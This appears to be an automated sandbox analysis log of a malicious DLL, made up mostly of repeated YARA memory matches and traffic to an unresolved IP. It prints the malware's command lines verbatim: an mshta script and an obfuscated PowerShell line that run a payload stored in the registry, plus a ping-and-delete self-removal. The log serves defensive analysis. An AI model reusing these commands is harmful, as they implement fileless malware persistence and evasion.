Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 146.70.35.138 |
Source: Yara match |
File source: 00000003.00000003.347592975.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347464949.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347651204.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.395328868.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347373616.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347625581.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347667655.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347551672.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000015.00000003.473788937.0000020C7835C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347265097.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.454702923.0000000006628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000003.472223678.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.394403969.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.392369617.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000003.472064443.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 344, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6736, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 720, type: MEMORYSTR |
Source: Yara match |
File source: 3.3.rundll32.exe.51194a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.51194a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.5796940.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.rundll32.exe.5240000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.57694a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.56ea4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.56ea4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000003.00000003.517576476.0000000005119000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.524999035.000000000546F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000000.469785731.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000000.469105501.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.518835628.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000000.471017124.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.394225143.00000000056EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.394254526.0000000005769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347592975.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347464949.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347651204.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.395328868.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347373616.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347625581.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347667655.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347551672.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000015.00000003.473788937.0000020C7835C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347265097.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.454702923.0000000006628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000003.472223678.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.394403969.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.392369617.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000003.472064443.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 344, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6736, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 720, type: MEMORYSTR |
Source: Yara match |
File source: 3.3.rundll32.exe.51194a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.51194a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.5796940.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.rundll32.exe.5240000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.57694a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.56ea4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.56ea4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000003.00000003.517576476.0000000005119000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.524999035.000000000546F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000000.469785731.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000000.469105501.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.518835628.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000000.471017124.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.394225143.00000000056EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.394254526.0000000005769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\pDut.dll" |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pDut.dll",#1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pDut.dll",#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 304 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 260 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 268 |
|
Source: unknown |
Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Wefk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wefk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> |
|
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iqioaqncxw -value gp; new-alias -name fchfny -value iex; fchfny ([System.Text.Encoding]::ASCII.GetString((iqioaqncxw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cweuuamv.cmdline |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B19.tmp" "c:\Users\user\AppData\Local\Temp\CSC9452DD6E90C74A5284F45229D37BC.TMP" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41kkxng4.cmdline |
|
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES52D7.tmp" "c:\Users\user\AppData\Local\Temp\CSCE5529B6452BD443991E7FB86A88433C.TMP" |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\pDut.dll |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
|
Source: unknown |
Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil qe "application" /c:100 /rd:false |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pDut.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pDut.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iqioaqncxw -value gp; new-alias -name fchfny -value iex; fchfny ([System.Text.Encoding]::ASCII.GetString((iqioaqncxw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cweuuamv.cmdline |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41kkxng4.cmdline |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B19.tmp" "c:\Users\user\AppData\Local\Temp\CSC9452DD6E90C74A5284F45229D37BC.TMP" |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES52D7.tmp" "c:\Users\user\AppData\Local\Temp\CSCE5529B6452BD443991E7FB86A88433C.TMP" |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\pDut.dll |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
|
Source: Yara match |
File source: 00000003.00000003.347592975.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347464949.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347651204.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.395328868.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347373616.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347625581.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347667655.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347551672.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000015.00000003.473788937.0000020C7835C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347265097.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.454702923.0000000006628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000003.472223678.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.394403969.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.392369617.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000003.472064443.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 344, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6736, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 720, type: MEMORYSTR |
Source: Yara match |
File source: 3.3.rundll32.exe.51194a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.51194a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.5796940.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.rundll32.exe.5240000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.57694a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.56ea4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.56ea4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000003.00000003.517576476.0000000005119000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.524999035.000000000546F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000000.469785731.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000000.469105501.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.518835628.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000000.471017124.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.394225143.00000000056EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.394254526.0000000005769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
